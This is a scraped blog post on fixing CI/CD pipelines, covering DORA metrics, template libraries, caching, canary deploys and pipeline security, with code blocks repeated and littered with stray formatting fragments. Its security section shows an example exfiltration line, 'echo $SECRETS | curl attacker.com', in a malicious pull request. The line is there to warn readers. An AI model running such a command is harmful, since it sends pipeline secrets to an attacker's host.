Tools: Your CI/CD Pipeline is a Dumpster Fire β Here's the Extinguisher π§―
π¬ Welcome to Pipeline Therapy
π DORA Metrics: How to Know If You're Actually Good
Here's the Uncomfortable Truth
How to Track DORA Now
ποΈ Pipeline Architecture: The Template Library Pattern
The Anti-Pattern: Every Team Reinvents the Wheel
The Solution: Shared Template Library
Azure DevOps: Template Library in Action
GitHub Actions: Reusable Workflows
β‘ Pipeline Performance: From 45 Minutes to 5
Where's the Time Going?
The Optimization Playbook
π¨ Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything
π’ Deployment Strategies: How to Ship Without Sinking
The Deployment Strategy Menu
Canary Deployment: The Smart Way to Ship
π¨ Real-World Disaster #2: The Friday 5 PM Deployment
π Pipeline Security: Your Pipeline is an Attack Vector
Things That Should Scare You
Pipeline Security Checklist
π¨ Real-World Disaster #3: The Secret That Wasn't Secret
π Multi-Team Governance: Herding Cats With Guardrails
π― Key Takeaways
π₯ Homework Let me describe your CI/CD pipeline. Stop me when I'm wrong: Let's fix all of this. Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance: If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30% β you are statistically average. Not bad, but not good either. Elite teams deploy hundreds of times per day with less than 15% failure rate. They're not smarter β they have better pipelines, smaller changes, and more automation. Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise). In my experience auditing pipelines, here's where time hides: 2. Docker Layer Caching 3. Run Tests in Parallel 4. Only Test What Changed What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. Disk filled up. Builds started failing randomly across all teams. Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application. What Happened: Team deploys at 5:07 PM on Friday (bad idea, but deadlines). Rolling update replaces all 3 pods. New version has a memory leak that manifests after 4 hours. At 9 PM, pods start OOMKilling. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours. If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never noticed. Team enjoys their weekend. Your CI/CD pipeline has more access than most developers: What Happened: A developer added a debug step to a pipeline: GitHub/Azure DevOps masks secrets in logs... usually. But this string was partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers. At the Principal level, you're not just building pipelines β you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck: Next up in the series: **Your App is on Fire and You Don't Even Know: Observability for Humans* β where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.* π¬ What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below. π Templates let you quickly answer FAQs or store snippets for re-use. Hide child comments as well For further actions, you may consider blocking this person and/or reporting abuse
$ Metric β Elite β "We Need Help" ββββββββββββββββββββββββββΌβββββββββββββββββΌββββββββββββββββββ Deployment Frequency β Multiple/day β Monthly or less Lead Time for Changes β < 1 hour β > 1 month Change Failure Rate β 0-15% β > 45% Mean Time to Recovery β < 1 hour β > 6 months
Metric β Elite β "We Need Help" ββββββββββββββββββββββββββΌβββββββββββββββββΌββββββββββββββββββ Deployment Frequency β Multiple/day β Monthly or less Lead Time for Changes β < 1 hour β > 1 month Change Failure Rate β 0-15% β > 45% Mean Time to Recovery β < 1 hour β > 6 months
Metric β Elite β "We Need Help" ββββββββββββββββββββββββββΌβββββββββββββββββΌββββββββββββββββββ Deployment Frequency β Multiple/day β Monthly or less Lead Time for Changes β < 1 hour β > 1 month Change Failure Rate β 0-15% β > 45% Mean Time to Recovery β < 1 hour β > 6 months
# GitHub Actions: Track deployment frequency
- name: Record deployment run: | -weight: 500;">curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \ -H "Content-Type: application/json" \ -d '{ "event": "deployment", "-weight: 500;">service": "${{ github.repository }}", "environment": "production", "sha": "${{ github.sha }}", "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'" }'
# GitHub Actions: Track deployment frequency
- name: Record deployment run: | -weight: 500;">curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \ -H "Content-Type: application/json" \ -d '{ "event": "deployment", "-weight: 500;">service": "${{ github.repository }}", "environment": "production", "sha": "${{ github.sha }}", "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'" }'
# GitHub Actions: Track deployment frequency
- name: Record deployment run: | -weight: 500;">curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \ -H "Content-Type: application/json" \ -d '{ "event": "deployment", "-weight: 500;">service": "${{ github.repository }}", "environment": "production", "sha": "${{ github.sha }}", "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'" }'
Team Alpha: 800-line custom YAML β Azure DevOps
Team Bravo: 600-line custom YAML β Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" β π± Result: β’ 3 different security scanning approaches β’ 2 teams forgot to add container image scanning β’ 1 team has no tests in their pipeline β’ Nobody can help debug another team's pipeline
Team Alpha: 800-line custom YAML β Azure DevOps
Team Bravo: 600-line custom YAML β Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" β π± Result: β’ 3 different security scanning approaches β’ 2 teams forgot to add container image scanning β’ 1 team has no tests in their pipeline β’ Nobody can help debug another team's pipeline
Team Alpha: 800-line custom YAML β Azure DevOps
Team Bravo: 600-line custom YAML β Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" β π± Result: β’ 3 different security scanning approaches β’ 2 teams forgot to add container image scanning β’ 1 team has no tests in their pipeline β’ Nobody can help debug another team's pipeline
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Shared Template Library (v2.5.0) β
β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Build β β Test β β Security β β
β β Template β β Template β β Scan β β
β β (.NET, β β (unit, β β Template β β
β β Node, β β integ, β β (Trivy, β β
β β Python) β β e2e) β β Checkov) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Deploy β β Notify β β Rollback β β
β β Template β β Template β β Template β β
β β (K8s, β β (Slack, β β (auto/ β β
β β AppSvc) β β Teams) β β manual) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
ββββββββββββββββββββββββββββββββββββββββββββββββββββ β consumed by βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββ
β Team pipelines (10-20 lines each!) β
β "Use build template, test template, deploy β
β template β just tell it your -weight: 500;">service name" β
βββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Shared Template Library (v2.5.0) β
β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Build β β Test β β Security β β
β β Template β β Template β β Scan β β
β β (.NET, β β (unit, β β Template β β
β β Node, β β integ, β β (Trivy, β β
β β Python) β β e2e) β β Checkov) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Deploy β β Notify β β Rollback β β
β β Template β β Template β β Template β β
β β (K8s, β β (Slack, β β (auto/ β β
β β AppSvc) β β Teams) β β manual) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
ββββββββββββββββββββββββββββββββββββββββββββββββββββ β consumed by βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββ
β Team pipelines (10-20 lines each!) β
β "Use build template, test template, deploy β
β template β just tell it your -weight: 500;">service name" β
βββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Shared Template Library (v2.5.0) β
β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Build β β Test β β Security β β
β β Template β β Template β β Scan β β
β β (.NET, β β (unit, β β Template β β
β β Node, β β integ, β β (Trivy, β β
β β Python) β β e2e) β β Checkov) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
β β Deploy β β Notify β β Rollback β β
β β Template β β Template β β Template β β
β β (K8s, β β (Slack, β β (auto/ β β
β β AppSvc) β β Teams) β β manual) β β
β βββββββββββββ βββββββββββββ βββββββββββββββββ β
ββββββββββββββββββββββββββββββββββββββββββββββββββββ β consumed by βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββ
β Team pipelines (10-20 lines each!) β
β "Use build template, test template, deploy β
β template β just tell it your -weight: 500;">service name" β
βββββββββββββββββββββββββββββββββββββββββββββββββββ
# Team's pipeline: SHORT and STANDARD
trigger: branches: include: [main] resources: repositories: - repository: templates type: -weight: 500;">git name: platform/pipeline-templates ref: refs/tags/v2.5.0 # π Always pin the version! stages: - template: stages/ci.yml@templates parameters: language: dotnet dotnetVersion: '8.0' testProjects: '**/*Tests.csproj' - template: stages/security-scan.yml@templates parameters: trivySeverity: 'CRITICAL,HIGH' - template: stages/deploy-k8s.yml@templates parameters: environment: staging aksCluster: aks-staging-eastus namespace: payments - template: stages/deploy-k8s.yml@templates parameters: environment: production aksCluster: aks-prod-eastus namespace: payments requireApproval: true
# Team's pipeline: SHORT and STANDARD
trigger: branches: include: [main] resources: repositories: - repository: templates type: -weight: 500;">git name: platform/pipeline-templates ref: refs/tags/v2.5.0 # π Always pin the version! stages: - template: stages/ci.yml@templates parameters: language: dotnet dotnetVersion: '8.0' testProjects: '**/*Tests.csproj' - template: stages/security-scan.yml@templates parameters: trivySeverity: 'CRITICAL,HIGH' - template: stages/deploy-k8s.yml@templates parameters: environment: staging aksCluster: aks-staging-eastus namespace: payments - template: stages/deploy-k8s.yml@templates parameters: environment: production aksCluster: aks-prod-eastus namespace: payments requireApproval: true
# Team's pipeline: SHORT and STANDARD
trigger: branches: include: [main] resources: repositories: - repository: templates type: -weight: 500;">git name: platform/pipeline-templates ref: refs/tags/v2.5.0 # π Always pin the version! stages: - template: stages/ci.yml@templates parameters: language: dotnet dotnetVersion: '8.0' testProjects: '**/*Tests.csproj' - template: stages/security-scan.yml@templates parameters: trivySeverity: 'CRITICAL,HIGH' - template: stages/deploy-k8s.yml@templates parameters: environment: staging aksCluster: aks-staging-eastus namespace: payments - template: stages/deploy-k8s.yml@templates parameters: environment: production aksCluster: aks-prod-eastus namespace: payments requireApproval: true
# .github/workflows/deploy.yml β Team's workflow
name: Deploy
on: push: branches: [main] jobs: build-and-test: uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected] with: dotnet-version: '8.0' project-path: 'src/PaymentService' security-scan: needs: build-and-test uses: myorg/shared-workflows/.github/workflows/security-scan[email protected] with: image: ${{ needs.build-and-test.outputs.image }} deploy: needs: [build-and-test, security-scan] uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected] with: environment: production image: ${{ needs.build-and-test.outputs.image }} secrets: inherit
# .github/workflows/deploy.yml β Team's workflow
name: Deploy
on: push: branches: [main] jobs: build-and-test: uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected] with: dotnet-version: '8.0' project-path: 'src/PaymentService' security-scan: needs: build-and-test uses: myorg/shared-workflows/.github/workflows/security-scan[email protected] with: image: ${{ needs.build-and-test.outputs.image }} deploy: needs: [build-and-test, security-scan] uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected] with: environment: production image: ${{ needs.build-and-test.outputs.image }} secrets: inherit
# .github/workflows/deploy.yml β Team's workflow
name: Deploy
on: push: branches: [main] jobs: build-and-test: uses: myorg/shared-workflows/.github/workflows/build-dotnet[email protected] with: dotnet-version: '8.0' project-path: 'src/PaymentService' security-scan: needs: build-and-test uses: myorg/shared-workflows/.github/workflows/security-scan[email protected] with: image: ${{ needs.build-and-test.outputs.image }} deploy: needs: [build-and-test, security-scan] uses: myorg/shared-workflows/.github/workflows/deploy-k8s[email protected] with: environment: production image: ${{ needs.build-and-test.outputs.image }} secrets: inherit
Typical 45-minute pipeline breakdown:
βββββββββββββββββββββββββββββββββββββββββββ 7 min ββββββββ Agent startup + checkout 12 min ββββββββββββββ Dependency -weight: 500;">install (-weight: 500;">npm/nuget) 5 min βββββββ Build 8 min ββββββββββ Tests (running ALL tests sequentially) 3 min βββββ Docker build (no layer caching) 5 min βββββββ Security scanning 5 min βββββββ Deploy + smoke tests
βββββββββββββββββββββββββββββββββββββββββββ 45 min total π€ Optimized 5-minute pipeline:
βββββββββββββββββββββββββββββββββββββββββββ 0.5 min βββ Cached checkout 0.5 min βββ Cached dependencies 1 min ββββ Incremental build 1 min ββββ Parallel tests (affected only) 0.5 min βββ Docker build (cached layers) 1 min ββββ Parallel: scan + deploy 0.5 min βββ Smoke test
βββββββββββββββββββββββββββββββββββββββββββ 5 min total π
Typical 45-minute pipeline breakdown:
βββββββββββββββββββββββββββββββββββββββββββ 7 min ββββββββ Agent startup + checkout 12 min ββββββββββββββ Dependency -weight: 500;">install (-weight: 500;">npm/nuget) 5 min βββββββ Build 8 min ββββββββββ Tests (running ALL tests sequentially) 3 min βββββ Docker build (no layer caching) 5 min βββββββ Security scanning 5 min βββββββ Deploy + smoke tests
βββββββββββββββββββββββββββββββββββββββββββ 45 min total π€ Optimized 5-minute pipeline:
βββββββββββββββββββββββββββββββββββββββββββ 0.5 min βββ Cached checkout 0.5 min βββ Cached dependencies 1 min ββββ Incremental build 1 min ββββ Parallel tests (affected only) 0.5 min βββ Docker build (cached layers) 1 min ββββ Parallel: scan + deploy 0.5 min βββ Smoke test
βββββββββββββββββββββββββββββββββββββββββββ 5 min total π
Typical 45-minute pipeline breakdown:
βββββββββββββββββββββββββββββββββββββββββββ 7 min ββββββββ Agent startup + checkout 12 min ββββββββββββββ Dependency -weight: 500;">install (-weight: 500;">npm/nuget) 5 min βββββββ Build 8 min ββββββββββ Tests (running ALL tests sequentially) 3 min βββββ Docker build (no layer caching) 5 min βββββββ Security scanning 5 min βββββββ Deploy + smoke tests
βββββββββββββββββββββββββββββββββββββββββββ 45 min total π€ Optimized 5-minute pipeline:
βββββββββββββββββββββββββββββββββββββββββββ 0.5 min βββ Cached checkout 0.5 min βββ Cached dependencies 1 min ββββ Incremental build 1 min ββββ Parallel tests (affected only) 0.5 min βββ Docker build (cached layers) 1 min ββββ Parallel: scan + deploy 0.5 min βββ Smoke test
βββββββββββββββββββββββββββββββββββββββββββ 5 min total π
# GitHub Actions: Cache node_modules
- uses: actions/cache@v4 with: path: ~/.-weight: 500;">npm key: -weight: 500;">npm-${{ hashFiles('**/package-lock.json') }} restore-keys: -weight: 500;">npm- # Azure DevOps: Cache NuGet packages
- task: Cache@2 inputs: key: 'nuget | "$(Agent.OS)" | **/packages.lock.json' restoreKeys: 'nuget | "$(Agent.OS)"' path: $(NUGET_PACKAGES)
# GitHub Actions: Cache node_modules
- uses: actions/cache@v4 with: path: ~/.-weight: 500;">npm key: -weight: 500;">npm-${{ hashFiles('**/package-lock.json') }} restore-keys: -weight: 500;">npm- # Azure DevOps: Cache NuGet packages
- task: Cache@2 inputs: key: 'nuget | "$(Agent.OS)" | **/packages.lock.json' restoreKeys: 'nuget | "$(Agent.OS)"' path: $(NUGET_PACKAGES)
# GitHub Actions: Cache node_modules
- uses: actions/cache@v4 with: path: ~/.-weight: 500;">npm key: -weight: 500;">npm-${{ hashFiles('**/package-lock.json') }} restore-keys: -weight: 500;">npm- # Azure DevOps: Cache NuGet packages
- task: Cache@2 inputs: key: 'nuget | "$(Agent.OS)" | **/packages.lock.json' restoreKeys: 'nuget | "$(Agent.OS)"' path: $(NUGET_PACKAGES)
# BAD: Copying everything first breaks the cache
COPY . .
RUN -weight: 500;">npm -weight: 500;">install # GOOD: Copy package files first, -weight: 500;">install, THEN copy code
COPY package.json package-lock.json ./
RUN -weight: 500;">npm ci --production
COPY . .
# Now code changes don't re-trigger -weight: 500;">npm -weight: 500;">install
# BAD: Copying everything first breaks the cache
COPY . .
RUN -weight: 500;">npm -weight: 500;">install # GOOD: Copy package files first, -weight: 500;">install, THEN copy code
COPY package.json package-lock.json ./
RUN -weight: 500;">npm ci --production
COPY . .
# Now code changes don't re-trigger -weight: 500;">npm -weight: 500;">install
# BAD: Copying everything first breaks the cache
COPY . .
RUN -weight: 500;">npm -weight: 500;">install # GOOD: Copy package files first, -weight: 500;">install, THEN copy code
COPY package.json package-lock.json ./
RUN -weight: 500;">npm ci --production
COPY . .
# Now code changes don't re-trigger -weight: 500;">npm -weight: 500;">install
# GitHub Actions: Matrix strategy
jobs: test: strategy: matrix: shard: [1, 2, 3, 4] steps: - run: -weight: 500;">npm test -- --shard=${{ matrix.shard }}/4
# GitHub Actions: Matrix strategy
jobs: test: strategy: matrix: shard: [1, 2, 3, 4] steps: - run: -weight: 500;">npm test -- --shard=${{ matrix.shard }}/4
# GitHub Actions: Matrix strategy
jobs: test: strategy: matrix: shard: [1, 2, 3, 4] steps: - run: -weight: 500;">npm test -- --shard=${{ matrix.shard }}/4
# For monorepos: detect which -weight: 500;">service changed
- uses: dorny/paths-filter@v3 id: changes with: filters: | payments: - 'services/payments/**' users: - 'services/users/**' - name: Test payments if: steps.changes.outputs.payments == 'true' run: cd services/payments && -weight: 500;">npm test
# For monorepos: detect which -weight: 500;">service changed
- uses: dorny/paths-filter@v3 id: changes with: filters: | payments: - 'services/payments/**' users: - 'services/users/**' - name: Test payments if: steps.changes.outputs.payments == 'true' run: cd services/payments && -weight: 500;">npm test
# For monorepos: detect which -weight: 500;">service changed
- uses: dorny/paths-filter@v3 id: changes with: filters: | payments: - 'services/payments/**' users: - 'services/users/**' - name: Test payments if: steps.changes.outputs.payments == 'true' run: cd services/payments && -weight: 500;">npm test
ERROR: -weight: 500;">npm ERR! ENOSPC: no space left on device
ERROR: -weight: 500;">npm ERR! ENOSPC: no space left on device
ERROR: -weight: 500;">npm ERR! ENOSPC: no space left on device
- name: Agent cleanup condition: always() run: | -weight: 500;">docker system prune -af --volumes rm -rf /tmp/build-*
- name: Agent cleanup condition: always() run: | -weight: 500;">docker system prune -af --volumes rm -rf /tmp/build-*
- name: Agent cleanup condition: always() run: | -weight: 500;">docker system prune -af --volumes rm -rf /tmp/build-*
Strategy β Risk β Speed β Rollback β Best For
ββββββββββββββββββββΌββββββββΌββββββββΌβββββββββββΌββββββββββββββββββ
Rolling Update β Med β Fast β Slow β Default K8s strategy
Blue-Green β Low β Fast β Instant β Stateless services
Canary β Low β Slow β Fast β High-risk changes
Feature Flags β Lowestβ Inst. β Instant β Business logic changes
Strategy β Risk β Speed β Rollback β Best For
ββββββββββββββββββββΌββββββββΌββββββββΌβββββββββββΌββββββββββββββββββ
Rolling Update β Med β Fast β Slow β Default K8s strategy
Blue-Green β Low β Fast β Instant β Stateless services
Canary β Low β Slow β Fast β High-risk changes
Feature Flags β Lowestβ Inst. β Instant β Business logic changes
Strategy β Risk β Speed β Rollback β Best For
ββββββββββββββββββββΌββββββββΌββββββββΌβββββββββββΌββββββββββββββββββ
Rolling Update β Med β Fast β Slow β Default K8s strategy
Blue-Green β Low β Fast β Instant β Stateless services
Canary β Low β Slow β Fast β High-risk changes
Feature Flags β Lowestβ Inst. β Instant β Business logic changes
Step 1: Deploy new version to 5% of traffic βββββββββββββββββββββββββββββββββββ β 95% traffic β v1.0 (3 pods) β β 5% traffic β v2.0 (1 pod) β β Watch error rates, latency βββββββββββββββββββββββββββββββββββ Step 2: If metrics look good, increase to 25% βββββββββββββββββββββββββββββββββββ β 75% traffic β v1.0 (3 pods) β β 25% traffic β v2.0 (1 pod) β β Still watching... βββββββββββββββββββββββββββββββββββ Step 3: If still good, go to 100% βββββββββββββββββββββββββββββββββββ β 100% traffic β v2.0 (3 pods) β β π Full rollout βββββββββββββββββββββββββββββββββββ Step ABORT: If any stage looks bad βββββββββββββββββββββββββββββββββββ β 100% traffic β v1.0 (3 pods) β β π Safely rolled back β 0% traffic β v2.0 (removed) β βββββββββββββββββββββββββββββββββββ
Step 1: Deploy new version to 5% of traffic βββββββββββββββββββββββββββββββββββ β 95% traffic β v1.0 (3 pods) β β 5% traffic β v2.0 (1 pod) β β Watch error rates, latency βββββββββββββββββββββββββββββββββββ Step 2: If metrics look good, increase to 25% βββββββββββββββββββββββββββββββββββ β 75% traffic β v1.0 (3 pods) β β 25% traffic β v2.0 (1 pod) β β Still watching... βββββββββββββββββββββββββββββββββββ Step 3: If still good, go to 100% βββββββββββββββββββββββββββββββββββ β 100% traffic β v2.0 (3 pods) β β π Full rollout βββββββββββββββββββββββββββββββββββ Step ABORT: If any stage looks bad βββββββββββββββββββββββββββββββββββ β 100% traffic β v1.0 (3 pods) β β π Safely rolled back β 0% traffic β v2.0 (removed) β βββββββββββββββββββββββββββββββββββ
Step 1: Deploy new version to 5% of traffic βββββββββββββββββββββββββββββββββββ β 95% traffic β v1.0 (3 pods) β β 5% traffic β v2.0 (1 pod) β β Watch error rates, latency βββββββββββββββββββββββββββββββββββ Step 2: If metrics look good, increase to 25% βββββββββββββββββββββββββββββββββββ β 75% traffic β v1.0 (3 pods) β β 25% traffic β v2.0 (1 pod) β β Still watching... βββββββββββββββββββββββββββββββββββ Step 3: If still good, go to 100% βββββββββββββββββββββββββββββββββββ β 100% traffic β v2.0 (3 pods) β β π Full rollout βββββββββββββββββββββββββββββββββββ Step ABORT: If any stage looks bad βββββββββββββββββββββββββββββββββββ β 100% traffic β v1.0 (3 pods) β β π Safely rolled back β 0% traffic β v2.0 (removed) β βββββββββββββββββββββββββββββββββββ
Scary Thing #1: Secrets in pipeline logs βββββββββββββββββββββββββββββββββββββββββββββββ β Step: Deploy β β $ echo $DATABASE_CONNECTION_STRING β β Server=prod.db.windows.net;Password=Pa$$w0rdβ β π« βββββββββββββββββββββββββββββββββββββββββββββββ Scary Thing #2: Pull request pipelines run arbitrary code βββββββββββββββββββββββββββββββββββββββββββββββ β External contributor opens PR β β PR changes build script to: β β echo $SECRETS | -weight: 500;">curl attacker.com β β Pipeline runs automatically... β β π± βββββββββββββββββββββββββββββββββββββββββββββββ Scary Thing #3: Dependency confusion attacks βββββββββββββββββββββββββββββββββββββββββββββββ β Internal package: @mycompany/utils β β Attacker publishes: @mycompany/utils on -weight: 500;">npm β β Pipeline installs public one first... β β π¦ βββββββββββββββββββββββββββββββββββββββββββββββ
Scary Thing #1: Secrets in pipeline logs βββββββββββββββββββββββββββββββββββββββββββββββ β Step: Deploy β β $ echo $DATABASE_CONNECTION_STRING β β Server=prod.db.windows.net;Password=Pa$$w0rdβ β π« βββββββββββββββββββββββββββββββββββββββββββββββ Scary Thing #2: Pull request pipelines run arbitrary code βββββββββββββββββββββββββββββββββββββββββββββββ β External contributor opens PR β β PR changes build script to: β β echo $SECRETS | -weight: 500;">curl attacker.com β β Pipeline runs automatically... β β π± βββββββββββββββββββββββββββββββββββββββββββββββ Scary Thing #3: Dependency confusion attacks βββββββββββββββββββββββββββββββββββββββββββββββ β Internal package: @mycompany/utils β β Attacker publishes: @mycompany/utils on -weight: 500;">npm β β Pipeline installs public one first... β β π¦ βββββββββββββββββββββββββββββββββββββββββββββββ
Scary Thing #1: Secrets in pipeline logs βββββββββββββββββββββββββββββββββββββββββββββββ β Step: Deploy β β $ echo $DATABASE_CONNECTION_STRING β β Server=prod.db.windows.net;Password=Pa$$w0rdβ β π« βββββββββββββββββββββββββββββββββββββββββββββββ Scary Thing #2: Pull request pipelines run arbitrary code βββββββββββββββββββββββββββββββββββββββββββββββ β External contributor opens PR β β PR changes build script to: β β echo $SECRETS | -weight: 500;">curl attacker.com β β Pipeline runs automatically... β β π± βββββββββββββββββββββββββββββββββββββββββββββββ Scary Thing #3: Dependency confusion attacks βββββββββββββββββββββββββββββββββββββββββββββββ β Internal package: @mycompany/utils β β Attacker publishes: @mycompany/utils on -weight: 500;">npm β β Pipeline installs public one first... β β π¦ βββββββββββββββββββββββββββββββββββββββββββββββ
Authentication: β
OIDC federation (no long-lived secrets in pipelines) β
Managed Identity for Azure resources β
Short-lived tokens (expire in minutes, not months) Authorization: β
Pipeline can only deploy to its own -weight: 500;">service β
Production deploys require approved PR + passing checks β
Environment protection rules with required reviewers Dependencies: β
Lock files committed (package-lock.json, go.sum) β
Dependency scanning (Dependabot, Snyk) β
Private package registry for internal packages Secrets: β
Never echo/print secrets in logs β
Use secret masking in pipeline variables β
Rotate secrets automatically β
Audit who accesses what secret
Authentication: β
OIDC federation (no long-lived secrets in pipelines) β
Managed Identity for Azure resources β
Short-lived tokens (expire in minutes, not months) Authorization: β
Pipeline can only deploy to its own -weight: 500;">service β
Production deploys require approved PR + passing checks β
Environment protection rules with required reviewers Dependencies: β
Lock files committed (package-lock.json, go.sum) β
Dependency scanning (Dependabot, Snyk) β
Private package registry for internal packages Secrets: β
Never echo/print secrets in logs β
Use secret masking in pipeline variables β
Rotate secrets automatically β
Audit who accesses what secret
Authentication: β
OIDC federation (no long-lived secrets in pipelines) β
Managed Identity for Azure resources β
Short-lived tokens (expire in minutes, not months) Authorization: β
Pipeline can only deploy to its own -weight: 500;">service β
Production deploys require approved PR + passing checks β
Environment protection rules with required reviewers Dependencies: β
Lock files committed (package-lock.json, go.sum) β
Dependency scanning (Dependabot, Snyk) β
Private package registry for internal packages Secrets: β
Never echo/print secrets in logs β
Use secret masking in pipeline variables β
Rotate secrets automatically β
Audit who accesses what secret
- name: Debug connection run: | echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"
- name: Debug connection run: | echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"
- name: Debug connection run: | echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"
# GitHub Actions: OIDC to Azure (no secrets!)
permissions: id-token: write contents: read steps: - uses: azure/login@v2 with: client-id: ${{ vars.AZURE_CLIENT_ID }} # Not a secret! tenant-id: ${{ vars.AZURE_TENANT_ID }} subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}
# GitHub Actions: OIDC to Azure (no secrets!)
permissions: id-token: write contents: read steps: - uses: azure/login@v2 with: client-id: ${{ vars.AZURE_CLIENT_ID }} # Not a secret! tenant-id: ${{ vars.AZURE_TENANT_ID }} subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}
# GitHub Actions: OIDC to Azure (no secrets!)
permissions: id-token: write contents: read steps: - uses: azure/login@v2 with: client-id: ${{ vars.AZURE_CLIENT_ID }} # Not a secret! tenant-id: ${{ vars.AZURE_TENANT_ID }} subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}
Platform Team Provides: App Teams Customize:
ββββββββββββββββββββββββ ββββββββββββββββββββ
β
Template library β
Service name & config
β
Security scanning β
Test commands
β
Deployment strategies β
Environment-specific vars
β
Secret management pattern β
Notification channels
β
DORA metrics collection β
Deployment schedule
β
Compliance guardrails β
Custom test stages
Platform Team Provides: App Teams Customize:
ββββββββββββββββββββββββ ββββββββββββββββββββ
β
Template library β
Service name & config
β
Security scanning β
Test commands
β
Deployment strategies β
Environment-specific vars
β
Secret management pattern β
Notification channels
β
DORA metrics collection β
Deployment schedule
β
Compliance guardrails β
Custom test stages
Platform Team Provides: App Teams Customize:
ββββββββββββββββββββββββ ββββββββββββββββββββ
β
Template library β
Service name & config
β
Security scanning β
Test commands
β
Deployment strategies β
Environment-specific vars
β
Secret management pattern β
Notification channels
β
DORA metrics collection β
Deployment schedule
β
Compliance guardrails β
Custom test stages
Template repo: platform/pipeline-templates
βββ Maintained by platform team
βββ Versioned with semantic versioning (v2.5.0)
βββ Teams consume via -weight: 500;">git tags (immutable reference)
βββ Breaking changes = major version bump
βββ Teams can contribute improvements via PR
βββ Monthly "template office hours" for questions
Template repo: platform/pipeline-templates
βββ Maintained by platform team
βββ Versioned with semantic versioning (v2.5.0)
βββ Teams consume via -weight: 500;">git tags (immutable reference)
βββ Breaking changes = major version bump
βββ Teams can contribute improvements via PR
βββ Monthly "template office hours" for questions
Template repo: platform/pipeline-templates
βββ Maintained by platform team
βββ Versioned with semantic versioning (v2.5.0)
βββ Teams consume via -weight: 500;">git tags (immutable reference)
βββ Breaking changes = major version bump
βββ Teams can contribute improvements via PR
βββ Monthly "template office hours" for questions - It takes 42 minutes to build and deploy
- Nobody knows exactly what it does (the YAML is 800 lines)
- Each team has their own custom pipeline because "our needs are different"
- Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
- There's a manual approval step where someone clicks "Approve" without looking
- Someone set it up 3 years ago and that person doesn't work here anymore - Use ephemeral agents (fresh VM/container per build) β Azure DevOps Scale Set agents or GitHub Actions hosted runners
- If self-hosted, add a cleanup job: - Never deploy on Friday (unless you have canary + automated rollback)
- Never deploy during peak hours (find your low-traffic window)
- Always have automated rollback based on error rates and latency
- Small changes, frequent deploys > big changes, occasional deploys - It can push code to production
- It has access to secrets and credentials
- It can modify infrastructure
- It downloads code from the internet (dependencies) - Remove all echo/print statements that reference secrets
- Use OIDC federation so there are no secrets to leak: - Measure DORA metrics β you can't improve what you don't measure
- Template libraries standardize quality without removing team autonomy
- Cache everything to cut build times by 80%+
- Canary deployments are the safest way to ship to production
- OIDC federation eliminates the #1 pipeline security risk (leaked secrets)
- Never deploy on Friday. Just don't. π
- Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck.
- Check if your pipeline uses long-lived secrets. Replace one with OIDC federation.
- Add caching for dependencies if you haven't already β measure the before/after build time.